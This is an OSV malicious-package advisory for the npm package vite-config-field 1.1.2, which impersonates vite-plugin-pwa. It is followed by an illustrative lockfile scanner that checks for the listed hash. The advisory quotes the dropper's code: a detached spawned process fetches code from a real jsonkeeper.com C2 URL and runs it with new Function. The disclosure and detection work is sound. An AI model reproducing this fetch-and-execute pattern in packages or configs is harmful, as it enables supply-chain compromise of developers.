MAL-2026-5936

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-config-field/MAL-2026-5936.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5936
Published
2026-06-16T22:20:36Z
Modified
2026-06-16T23:16:57.151678802Z
Summary
Malicious code in vite-config-field (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (d52d1d84d7572baf6a74539864b64d5b5c803f828fc82a1dae4de2dfebdb986f)

Package impersonates the legitimate vite-plugin-pwa (cloned description 'Zero-config PWA for Vite', repository vite-pwa/vite-config-field, funding link to github.com/sponsors/antfu, and exports matching the upstream API including VitePWA, cachePreset, and configField). When a consumer adds the plugin to their Vite config and the exported configField() runs, it invokes getUseropt() which calls child_process.spawn('node', ['./client/dev/reactopt.js',...], { detached: true, stdio: 'ignore' }) and unrefs the child. The spawned dist/client/dev/reactopt.js performs axios.get('https://www.jsonkeeper.com/b/HIECD', { headers: { 'x-secret-key': '_' } }), takes response.data.Cookie, and executes it with new Function('require', s)(require) — arbitrary remote code execution with full require capability, retrying 5 times. The C2 URL is disguised inside a fake process.env object (DEV_API_KEY/DEV_SECRET_KEY/DEV_SECRET_VALUE) to masquerade as environment-variable reads, and console output is silenced around the eval. The detached, stdio-ignored child means the dropper survives independent of the parent build/dev process.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006846",
            "import_time": "2026-06-16T23:03:43.587411959Z",
            "source": "amazon-inspector",
            "versions": [
                "1.1.2"
            ],
            "modified_time": "2026-06-16T22:20:36Z",
            "sha256": "d52d1d84d7572baf6a74539864b64d5b5c803f828fc82a1dae4de2dfebdb986f"
        }
    ]
}

Affected packages

npm / vite-config-field

Affected versions

1.1.2

Database specific

cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-config-field/MAL-2026-5936.json"
indicators
{
    "package_integrity": [
        {
            "filename": "vite-config-field-1.1.2.tgz",
            "hashes": {
                "sha1": "19924b02035488737fac3c7c766b38558cdc56b5",
                "sha512_sri": "sha512-SgjwfCuhi5SeYwryLDtzZtoWImWGCM/L6PMMwU6ScMRXsMIbmi2s59pRR0HRgbD7Y1300jIy2FPLkfX55KXPcQ=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "dist/client/dev/reactopt.js",
            "sha256": "dc0c817d1dae202d8736ee2fa5f5cd8eeb6a84c2226809efb4e42e0913e76704",
            "tlsh": "0721124f757ca0a8017013f6672be426f965643f300190d5739c87a21f3655da242fde"
        },
        {
            "path": "package.json",
            "sha256": "bed54d296fefee1487ca52c82c49024a22cfc46da713d95b549c7469e0873b22",
            "tlsh": "2da1ed26c8a14ce319c035a9ac6d4287e035954bcd96fc0473cc462e0f8e6af61be77e"
        }
    ]
}
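
A lockfile check built on the indicators above, as an added example that is not part of the advisory or of any scanner's own code: it walks a parsed package-lock.json and flags entries that match the affected version or the tarball integrity hash listed under package_integrity. The function name, the sample lockfile and the alias name pwa-helper are constructed for illustration.

```javascript
// Indicators copied from this advisory (MAL-2026-5936).
const IOC = {
  name: "vite-config-field",
  versions: ["1.1.2"],
  integrity: "sha512-SgjwfCuhi5SeYwryLDtzZtoWImWGCM/L6PMMwU6ScMRXsMIbmi2s59pRR0HRgbD7Y1300jIy2FPLkfX55KXPcQ==",
};

// Return one finding per lockfile entry matching the advisory.
// `lock` is a parsed package-lock.json (lockfileVersion 1, 2 or 3).
function findMaliciousEntries(lock, ioc = IOC) {
  const findings = [];
  const check = (where, name, entry) => {
    const reasons = [];
    // The tarball hash identifies the artifact even under an npm alias.
    if (entry.integrity === ioc.integrity) reasons.push("integrity");
    if (name === ioc.name && ioc.versions.includes(entry.version)) reasons.push("name@version");
    if (reasons.length) findings.push({ where, name, version: entry.version, reasons });
  };
  // v2/v3: flat "packages" map keyed by install path; "" is the root project.
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === "") continue;
    const i = path.lastIndexOf("node_modules/");
    const name = entry.name || (i < 0 ? path : path.slice(i + "node_modules/".length));
    check(path, name, entry);
  }
  // v1 only: nested "dependencies" tree keyed by package name.
  const walk = (deps, prefix) => {
    for (const [name, entry] of Object.entries(deps || {})) {
      check(prefix + name, name, entry);
      walk(entry.dependencies, `${prefix}${name} > `);
    }
  };
  if (!lock.packages) walk(lock.dependencies, "");
  return findings;
}

// Constructed sample lockfile (not from the advisory): a direct install,
// an aliased install, and an unrelated package with a placeholder hash.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "0.0.0" },
    "node_modules/vite-config-field": { version: "1.1.2", integrity: IOC.integrity },
    "node_modules/pwa-helper": { name: "vite-config-field", version: "1.1.2", integrity: IOC.integrity },
    "node_modules/vite": { version: "5.0.0", integrity: "sha512-CONSTRUCTED-PLACEHOLDER" },
  },
};

console.log(findMaliciousEntries(SAMPLE_LOCK));
```

To check a real project, pass the result of JSON.parse on its package-lock.json contents in place of SAMPLE_LOCK.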